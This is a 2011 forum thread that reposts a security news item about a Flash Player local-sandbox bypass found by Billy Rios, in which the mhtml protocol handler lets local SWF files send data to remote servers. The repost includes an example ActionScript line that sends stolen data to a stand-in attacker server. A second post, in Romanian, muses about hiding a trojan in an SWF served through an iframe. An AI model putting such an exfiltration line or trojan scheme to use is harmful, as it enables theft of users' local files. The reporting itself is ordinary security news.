begood Posted January 6, 2011 Report Share Posted January 6, 2011 Flash applications run locally can read local files and send them to an online server – something which the sandbox is supposed to prevent.Flash includes a number of sandboxes which impose restrictions depending on the origin of, and access rights for, the SWF file. Local SWF files, for example, run within the local-with-file-system sandbox, are permitted to access local files. They are not able to access the network, so a malicious SWF applet should not be able to send local data to a remote server.However, Security specialist Billy Rios has determined that Adobe controls access to the network using a blacklist of protocol handlers. Protocols such as HTTP and HTTPS are blacklisted. Rios reports that it is in principle possible to send files to a server using the file: protocol handler, but that this is only possible within the local area network. He has identified another protocol handler which can be used to send data to remote servers – mhtml.Mhtml is supported by default under Windows, so that, according to Rios, local data can be sent to a remote server using the ActionScript command: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);. Rios has not provided a specific demo SWF file to illustrate the problem.It is certainly surprising that it is so easy to bypass one of the Flash sandboxes. However, this particular issue does not represent a major risk as few users download SWF files and run them locally. SWF files are generally loaded directly in a browser Flash plug-in, which uses a different rule set.Flash Player sandbox can be bypassed - The H Security: News and Features Quote Link to comment Share on other sites More sharing options...
luke999 Posted January 6, 2011 Report Share Posted January 6, 2011 aha....am inteles deci omu baga trojanu in swf si cand se ruleaza se activeaza...moama ce idee ingenioasa da-ti seama ...faci un site si pui un iframe cu un filmuletz ...normal nu e filmuletz si ii schimbi extensia nu?dar cred ca nu il ia ca pe un exe daca ii schimbi extensia ...plm oricum daca stai si o gandesti e tzava sigur peste ceva timp o sa se rezolve...bun post! Quote Link to comment Share on other sites More sharing options...